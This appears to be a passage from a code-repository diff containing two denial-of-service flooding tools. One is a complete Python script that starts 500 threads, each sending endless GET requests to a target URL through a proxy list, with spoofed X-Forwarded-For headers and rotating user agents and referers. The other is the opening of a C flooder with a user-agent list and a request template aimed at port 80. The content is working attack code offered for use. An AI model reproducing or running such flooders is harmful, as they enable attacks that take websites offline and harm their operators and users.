"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.1) Gecko/20080722 Firefox/3.0.1 Kapiko/3.0"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; KKMAN3.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081217 KMLite/1.1.2"
|
||||
"Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; ru-RU) AppleWebKit/533.3 (KHTML, like Gecko) Leechcraft/0.4.55-13-g2230d9f Safari/533.3"
|
||||
"Links (6.9; Unix 6.9-astral sparc; 80x25)"
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1) Lobo/0.98.4"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070225 lolifox/0.32"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100403 Lorentz/3.6.3plugin2pre (.NET CLR 4.0.20506)"
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Lunascape 6.7.1.25446)"
|
||||
"Lynx/2.8.7rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/1.0.0a"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en; rv:1.7.12) Gecko/20050928 Firefox/1.0.7 Madfox/3.0"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; fr-fr) AppleWebKit/525.1+ (KHTML, like Gecko, Safari/525.1+) midori/1.19"
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; MyIE2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinFX RunTime 3.0.50727)"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a2pre) Gecko/20090908 Ubuntu/9.04 (jaunty) Namoroka/3.6a2pre GTB5 (.NET CLR 3.5.30729)"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/534.8 (KHTML, like Gecko) Navscape/Pre-0.2 Safari/534.8"
|
||||
"NCSA_Mosaic/2.7b4 (X11;AIX 1 000180663000)"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) NetNewsWire/3.2.7"
|
||||
"Mozilla/3.0 (compatible; NetPositive/2.2.2; BeOS)"
|
||||
"Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285"
|
||||
"NetSurf/2.0 (RISC OS; armv5l)"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941"
|
||||
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.1.1) Gecko/20090722 Firefox/3.5.1 Orca/1.2 build 2"
|
||||
"Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/146.1 (KHTML, like Gecko) osb-browser/0.5"
|
||||
"Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:15.0) Gecko/20120919 Firefox/15.1.1-x64 PaleMoon/15.1.1-x64"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080414 Firefox/2.0.0.13 Pogo/2.0.0.13.6866"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100402 Prism/1.0b4"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/533.3 (KHTML, like Gecko) QtWeb Internet Browser/3.7 http://www.QtWeb.net"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ) AppleWebKit/533.3 (KHTML, like Gecko) rekonq Safari/533.3"
|
||||
"retawq/0.2.6c [en] (text)"
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) RockMelt/0.9.58.494 Chrome/11.0.696.71 Safari/534.24"
|
||||
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
|
||||
"Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/419 (KHTML, like Gecko) Shiira/1.2.3 Safari/125"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b5pre) Gecko/20090519 Shiretoko/3.5b5pre"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; .NET4.0E; Sleipnir/2.9.9)"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; SlimBrowser)"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Stainless/0.5.3 Safari/525.20.1"
|
||||
"Sundance/0.9x(Compatible; Windows; U; en-US;)Version/0.9x"
|
||||
"Mozilla/6.0 (X11; U; Linux x86_64; en-US; rv:2.9.0.3) Gecko/2009022510 FreeBSD/ Sunrise/4.0.1/like Safari"
|
||||
"Surf/0.4.1 (X11; U; Unix; en-US) AppleWebKit/531.2+ Compatible (Safari; MSIE 9.0)"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.9) Gecko/20071110 Sylera/3.0.20 SeaMonkey/1.1.6"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; TencentTraveler 4.0; Trident/4.0; SLCC1; Media Center PC 5.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
|
||||
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10.5; rv:10.0.2) Gecko/20120216 Firefox/10.0.2 TenFourFox/7450"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; TheWorld)"
|
||||
"Uzbl (Webkit 1.3) (Linux i686 [i686])"
|
||||
"Vimprobable/0.9.20.5"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1pre) Gecko/20090629 Vonkeror/1.0"
|
||||
"w3m/0.52"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/534.12 (KHTML, like Gecko) WeltweitimnetzBrowser/0.25 Safari/534.12"
|
||||
"WorldWideweb (NEXT)"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20100121 Firefox/3.5.6 Wyzo/3.5.6.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
|
||||
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.5; zh-cn; HTC_IncredibleS_S710e Build/GRJ90) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.4; fr-fr; HTC Desire Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; T-Mobile myTouch 3G Slide Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC_Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC_Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; LG-LU3000 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; HTC_DesireS_S510e Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; HTC_DesireS_S510e Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; de-de; HTC Desire Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.3.3; de-ch; HTC Desire Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2; fr-lu; HTC Legend Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2; en-sa; HTC_DesireHD_A9191 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2.1; fr-fr; HTC_DesireZ_A7272 Build/FRG83D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2.1; en-gb; HTC_DesireZ_A7272 Build/FRG83D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+"
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 95; PalmSource; Blazer 3.0) 16; 160x160"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.340) AppleWebKit/530+ (KHTML, like Gecko) Version/4.0 Safari/530.17 UNTRUSTED/1.0 3gpp-gba"
|
||||
"SamsungI8910/SymbianOS/9.1 Series60/3.0"
|
||||
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC6-00/20.0.042; Profile/MIDP-2.1 Configuration/CLDC-1.1; zh-hk) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.2.6.9 3gpp-gba"
|
||||
"NokiaC6-00/10.0.021 (SymbianOS/9.4; Series60/5.0 Mozilla/5.0; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebkit/525 (KHTML, like Gecko) BrowserNG/7.2.6 UNTRUSTED/1.0 3gpp-gba"
|
||||
"NokiaN97/21.1.107 (SymbianOS/9.4; Series60/5.0 Mozilla/5.0; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebkit/525 (KHTML, like Gecko) BrowserNG/7.1.4"
|
||||
"NokiaC5-00/061.005 (SymbianOS/9.3; U; Series60/3.2 Mozilla/5.0; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 3gpp-gba"
|
||||
"Doris/1.15 [en] (Symbian)"
|
||||
"Mozilla/5.0 (Windows; U; Windows CE; Mobile; like iPhone; ko-kr) AppleWebKit/533.3 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.3 Dorothy"
|
||||
"Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0"
|
||||
"NokiaE66/GoBrowser/2.0.297"
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)"
|
||||
"Mozilla/5.0 (Windows NT; U; en) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Iris/1.1.7 Safari/525.20"
|
||||
"MOT-L7/NA.ACR_RB MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
|
||||
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025"
|
||||
"SAMSUNG-C5212/C5212XDIK1 NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1"
|
||||
"Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54"
|
||||
"Opera/12.02 (Android 4.1; Linux; Opera Mobi/ADR-1111101157; U; en-US) Presto/2.9.201 Version/12.02"
|
||||
"SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3 TeaShark/0.8"
|
||||
"Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; uZardWeb/1.0; Server_USA)",]
|
||||
|
||||
reFerers = [
|
||||
"https://www.facebook.com/l.php?u=",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://drive.google.com/viewerng/viewer?url=",
|
||||
"http://www.google.com/translate?u=",
|
||||
"https://plus.google.com/share?url=",
|
||||
"http://www.google.com/ig/add?feedurl=",
|
||||
"http://www.facebook.com/sharer/sharer.php?u=",
|
||||
"http://downforeveryoneorjustme.com/",
|
||||
"https://www.facebook.com/l.php?u=",]
|
||||
|
||||
def randomIp():
|
||||
random.seed()
|
||||
result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
|
||||
result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
|
||||
return result
|
||||
|
||||
def randomIpList():
|
||||
random.seed()
|
||||
res = ""
|
||||
for ip in xrange(random.randint(2, 8)):
|
||||
res = res + randomIp() + ", "
|
||||
return res[0:len(res) - 2]
|
||||
|
||||
def randomUserAgent():
|
||||
return random.choice(userAgents)
|
||||
|
||||
def randomReFerer():
|
||||
return random.choice(reFerers)
|
||||
|
||||
class attacco(threading.Thread):
|
||||
def run(self):
|
||||
current = x
|
||||
|
||||
if current < len(listaproxy):
|
||||
proxy = listaproxy[current].split(':')
|
||||
else:
|
||||
proxy = random.choice(listaproxy).split(':')
|
||||
|
||||
useragent = "User-Agent: " + randomUserAgent() + "\r\n"
|
||||
forward = "X-Forwarded-For: " + randomIpList() + "\r\n"
|
||||
referer = "Referer: "+ randomReFerer() + url + "?r="+ str(random.randint(1, 1000)) + "\r\n"
|
||||
httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n"
|
||||
|
||||
while nload:
|
||||
time.sleep(1)
|
||||
|
||||
while 1:
|
||||
try:
|
||||
a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
a.connect((proxy[0], int(proxy[1])))
|
||||
a.send(httprequest)
|
||||
try:
|
||||
for i in xrange(3):
|
||||
a.send(httprequest)
|
||||
except:
|
||||
tts = 1
|
||||
|
||||
|
||||
except:
|
||||
proxy = random.choice(listaproxy).split(':')
|
||||
|
||||
|
||||
|
||||
print bcolors.CYAN + \
|
||||
"""
|
||||
|
||||
X X X
|
||||
|
||||
"""
|
||||
|
||||
url = sys.argv[1]
|
||||
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
|
||||
|
||||
|
||||
in_file = open("proxys.txt","r")
|
||||
proxyf = in_file.read()
|
||||
in_file.close()
|
||||
|
||||
listaproxy = proxyf.split('\n')
|
||||
|
||||
thread = 500
|
||||
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
|
||||
accept = "Accept-Encoding: gzip, deflate\r\n"
|
||||
connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n"
|
||||
nload = 1
|
||||
x = 0
|
||||
|
||||
for x in xrange(thread):
|
||||
attacco().start()
|
||||
|
||||
print bcolors.RED + "Attack Started..."
|
||||
nload = 0
|
||||
while not nload:
|
||||
time.sleep(1)
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,581 @@
|
|||
#include <pthread.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netdb.h>
|
||||
#include <netinet/in.h>
|
||||
#include <ctype.h>
|
||||
|
||||
#define RND_CHAR (char)((rand() % 26)+97)
|
||||
|
||||
char *useragents[] = {
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
|
||||
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
|
||||
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
};
|
||||
#define ATTACKPORT 80
|
||||
char *postformat = "GET /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n";
|
||||
char *postpayload;
|
||||
struct urlparts {
|
||||
char * name;
|
||||
char separator[4];
|
||||
char value[128];
|
||||
} parts[] = {
|
||||
{ "scheme", ":" },
|
||||
{ "userid", "@" },
|
||||
{ "password", ":" },
|
||||
{ "host", "//" },
|
||||
{ "port", ":" },
|
||||
